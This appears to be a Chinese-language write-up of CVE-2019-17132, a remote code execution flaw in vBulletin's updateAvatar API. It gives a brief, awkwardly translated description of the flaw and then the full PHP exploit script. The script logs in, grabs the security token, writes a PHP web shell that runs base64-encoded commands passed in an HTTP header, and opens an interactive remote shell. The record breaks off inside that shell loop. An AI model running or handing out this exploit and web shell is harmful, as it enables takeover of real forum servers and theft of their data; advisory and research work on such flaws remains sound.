(CVE-2019-17132)vBulletin 5.0 \<5.5.4-\'updateAvatar\'身份验证的远程代码执行漏洞

一、漏洞简介

用户输入更新头像的的时候,前未正确验证提交的"数据[扩展]"和"数据[文件数据]"参数就发送到了" ajax / api / user / updateavatar",导致此突破的产生

利用此突破可以插入和执行任意php代码。

成功利用此突破需要"将头像另存为Files(头像保存为文件)"选项要启用(可选情况下少量)。

二、漏洞影响

三、复现过程

<?php

/*
    ---------------------------------------------------------------------
    vBulletin <= 5.5.4 (updateAvatar) 远程代码执行漏洞
    ---------------------------------------------------------------------

*/

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

print "+-------------------------------------------------------------------------+";
print "\n| vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------------+\n";

if ($argc != 4)
{
        print "\nUsage......: php $argv[0] <URL> <Username> <Password>\n";
        print "\nExample....: php $argv[0] http://localhost/vb/ user passwd";
        print "\nExample....: php $argv[0] [url]https://vbulletin.com/[/url] evil hacker\n\n";
        die();
}

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

$ch = curl_init();

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n";

curl_setopt($ch, CURLOPT_URL, $url);

if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n");

curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");
curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");

if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n");

print "[-] Logged-in! Retrieving security token...\n";

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);

if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n");

print "[-] Uploading new avatar...\n";

$params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]];

curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture");
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_HEADER, false);

if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n");

if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n");

print "[-] Updating avatar with PHP shell...\n";

$php_code = '<?php print("____"); passthru(base64_decode($_SERVER["HTTP_CMD"])); ?>';

$params = ["routestring" => "ajax/api/user/updateAvatar",
           "userid" => 0,
           "avatarid" => 0,
           "data[extension]" => "php",
           "data[filedata]" => $php_code,
           "securitytoken" => $token[1]];

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

if (curl_exec($ch) !== "true") die("[-] Update failed!\n");

print "[-] 上传shell中...\n";

preg_match('/(\d+)\.jpeg/', $path, $m);
$path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path);

curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}");
curl_setopt($ch, CURLOPT_POST, false);

while(1)
{
    print "\nvb-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
    preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");